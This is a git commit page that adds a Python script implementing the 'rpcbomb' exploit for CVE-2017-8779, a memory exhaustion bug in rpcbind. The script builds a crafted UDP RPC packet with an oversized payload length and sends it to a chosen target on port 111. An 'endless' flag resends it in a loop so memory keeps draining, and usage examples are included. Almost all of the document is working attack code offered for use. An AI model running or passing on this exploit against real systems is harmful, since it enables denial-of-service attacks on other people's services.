CVE-2017-8779
This commit is contained in:
dash
83
CVE-2017-8779_rpcbomb.py
Executable file
83
CVE-2017-8779_rpcbomb.py
Executable file
@@ -0,0 +1,83 @@
|
|||||||
|
#!/usr/bin/env python2
|
||||||
|
#
|
||||||
|
# CVE-2017-8779 aka rpcbomb.py
|
||||||
|
# python implementation of rpcbomb
|
||||||
|
# find page of bug author here: https://guidovranken.wordpress.com/
|
||||||
|
# original ruby exploit: https://www.exploit-db.com/exploits/41974
|
||||||
|
# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
|
||||||
|
#
|
||||||
|
# this one comes with loop and single packet, to consume memory over time and not just once
|
||||||
|
#
|
||||||
|
# i was not able to observe any sort of crash or alike
|
||||||
|
# on the testsystem the cpu consumption went up to 50% (1 CPU)
|
||||||
|
# memory allocation was done
|
||||||
|
# syslogd reportedly mentions out of memory from rpcbind
|
||||||
|
# depending on the environment and service offered probably interesting
|
||||||
|
#
|
||||||
|
# one packet
|
||||||
|
# ./rpcbomb.py -t 127.0.0.1
|
||||||
|
#
|
||||||
|
# define memory allocation
|
||||||
|
# ./rpcbomb.py -t 127.0.0.1 -l 1024
|
||||||
|
#
|
||||||
|
# endless mode
|
||||||
|
# ./rpcbomb.py -t 127.0.0.1 -e
|
||||||
|
#
|
||||||
|
# 2nd June 2017
|
||||||
|
# by dash
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import struct
|
||||||
|
import socket
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
def run(args):
|
||||||
|
|
||||||
|
ip = args.ip
|
||||||
|
paylen = args.malloc
|
||||||
|
port = args.port
|
||||||
|
|
||||||
|
pkt = struct.pack('!I',0) # xid
|
||||||
|
pkt += struct.pack('!I',0) # message type CALL
|
||||||
|
pkt += struct.pack('!I',2) # RPC version 2
|
||||||
|
pkt += struct.pack('!I',100000) # Program
|
||||||
|
pkt += struct.pack('!I',4) # Program version
|
||||||
|
pkt += struct.pack('!I',9) # Procedure
|
||||||
|
pkt += struct.pack('!I',0) # Creds AUTH_NULL
|
||||||
|
pkt += struct.pack('!I',0) # Creds len 0
|
||||||
|
pkt += struct.pack('!I',0) # Creds AUTH_NULL
|
||||||
|
pkt += struct.pack('!I',0) # Creds len 0
|
||||||
|
pkt += struct.pack('!I',0) # Program: 0
|
||||||
|
pkt += struct.pack('!I',0) # Ver
|
||||||
|
pkt += struct.pack('!I',4) # Proc
|
||||||
|
pkt += struct.pack('!I',4) # Argument length
|
||||||
|
pkt += struct.pack('!I',paylen) # Payloadlen
|
||||||
|
|
||||||
|
while 1:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||||
|
s.sendto(pkt, (ip, port))
|
||||||
|
data, addr = s.recvfrom(16384)
|
||||||
|
print '.',
|
||||||
|
sys.stdout.flush()
|
||||||
|
if not args.endless:
|
||||||
|
break
|
||||||
|
|
||||||
|
print
|
||||||
|
print 'Done'
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser_desc = 'rpcbomb - python exploit by dash'
|
||||||
|
prog_desc = 'portbind memory exhaustion exploit'
|
||||||
|
parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
|
||||||
|
parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip')
|
||||||
|
parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int)
|
||||||
|
parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int)
|
||||||
|
parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless')
|
||||||
|
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
run(args)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
Reference in New Issue
Block a user